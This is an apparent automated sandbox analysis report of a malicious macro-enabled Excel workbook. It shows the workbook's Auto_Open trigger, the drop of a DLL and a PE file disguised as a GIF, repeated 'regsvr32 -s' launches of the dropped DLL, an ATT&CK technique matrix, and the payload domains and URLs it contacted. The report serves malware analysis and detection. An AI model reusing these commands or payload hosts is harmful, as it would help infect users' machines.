    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gifJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\ghnrope2.dllJump to dropped file
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gif 71C11EEA1F3BECFDD2CF15807FACD1AA555E7EBBA9116905CDBA5DB6EB4F8F06
    Source: Joe Sandbox ViewDropped File: C:\Users\user\ghnrope2.dll 71C11EEA1F3BECFDD2CF15807FACD1AA555E7EBBA9116905CDBA5DB6EB4F8F06
    Source: workbook.xmlBinary string: " sheetId="6" r:id="rId1"/><sheet name="Doc1" sheetId="4" r:id="rId2"/><sheet name="Doc2" sheetId="1" r:id="rId3"/><sheet name="Doc3" sheetId="5" r:id="rId4"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'Doc1'!$AO$28</definedName></definedNames><calcPr calcId="122211"/></workbook>
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: classification engineClassification label: mal96.expl.evad.winXLSM@11/14@5/4
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{A4102F2A-A1ED-4B13-AA7E-46A53B500D91} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: documents-351331057.xlsmReversingLabs: Detection: 10%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\ghnrope
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\ghnropeJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: documents-351331057.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: documents-351331057.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: documents-351331057.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: documents-351331057.xlsmInitial sample: OLE zip file path = xl/media/image4.png
    Source: documents-351331057.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: documents-351331057.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: documents-351331057.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: documents-351331057.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gifJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\ghnrope2.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\ghnrope2.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gifJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\ghnrope2.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gifJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\ghnrope2.dllJump to dropped file
    Source: regsvr32.exe, 00000004.00000002.247184761.0000000003140000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: regsvr32.exe, 00000004.00000002.247184761.0000000003140000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: regsvr32.exe, 00000004.00000002.247184761.0000000003140000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: regsvr32.exe, 00000004.00000002.247184761.0000000003140000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: Yara matchFile source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21DLL Side-Loading1Process Injection1Masquerading121OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol14Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting21NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer3SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    documents-351331057.xlsm10%ReversingLabs

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    http://runolfsson-jayde07s.ru.com/ind.html0%Avira URL Cloudsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    http://cremin-ian07u.ru.com/ind.html0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    runolfsson-jayde07s.ru.com
    8.211.4.209
    truefalse
      unknown
      cremin-ian07u.ru.com
      8.211.4.209
      truefalse
        unknown
        cesiroinsurance.com
        67.222.38.97
        truefalse
          unknown
          shalombaptistchapel.com
          162.251.80.27
          truefalse
            unknown
            innermetransformation.com
            173.201.252.173
            truefalse
              unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://runolfsson-jayde07s.ru.com/ind.htmlfalse
              • Avira URL Cloud: safe
              unknown
              http://cremin-ian07u.ru.com/ind.htmlfalse
              • Avira URL Cloud: safe
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://api.diagnosticssdf.office.com9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                high
                https://login.microsoftonline.com/9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                  high
                  https://shell.suite.office.com:14439E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                    high
                    https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                      high
                      https://autodiscover-s.outlook.com/9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                        high
                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                          high
                          https://cdn.entity.9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://api.addins.omex.office.net/appinfo/query9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                            high
                            https://clients.config.office.net/user/v1.0/tenantassociationkey9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                              high
                              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                high
                                https://powerlift.acompli.net9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://rpsticket.partnerservices.getmicrosoftkey.com9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://lookup.onenote.com/lookup/geolocation/v19E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                  high
                                  https://cortana.ai9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                    high
                                    https://cloudfiles.onenote.com/upload.aspx9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                      high
                                      https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                        high
                                        https://entitlement.diagnosticssdf.office.com9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                          high
                                          https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                            high
                                            https://api.aadrm.com/9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://ofcrecsvcapi-int.azurewebsites.net/9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                              high
                                              https://api.microsoftstream.com/api/9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                high
                                                https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                  high
                                                  https://cr.office.com9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                    high
                                                    https://portal.office.com/account/?ref=ClientMeControl9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                      high
                                                      https://ecs.office.com/config/v2/Office9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                        high
                                                        https://graph.ppe.windows.net9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                          high
                                                          https://res.getmicrosoftkey.com/api/redemptionevents9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://powerlift-frontdesk.acompli.net9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://tasks.office.com9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                            high
                                                            https://officeci.azurewebsites.net/api/9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://sr.outlook.office.net/ws/speech/recognize/assistant/work9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                              high
                                                              https://store.office.cn/addinstemplate9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office.com/autosuggest/api/v1/init?cvid=9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                                high
                                                                https://globaldisco.crm.dynamics.com9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                                  high
                                                                  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                                    high
                                                                    https://store.officeppe.com/addinstemplate9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://dev0-api.acompli.net/autodetect9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://www.odwebp.svc.ms9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://api.powerbi.com/v1.0/myorg/groups9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                                      high
                                                                      https://web.microsoftstream.com/video/9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                                        high
                                                                        https://graph.windows.net9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                                          high
                                                                          https://dataservice.o365filtering.com/9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://officesetup.getmicrosoftkey.com9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://analysis.windows.net/powerbi/api9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                                            high
                                                                            https://prod-global-autodetect.acompli.net/autodetect9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://outlook.office365.com/autodiscover/autodiscover.json9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                                              high
                                                                              https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drfalse
                                                                                high
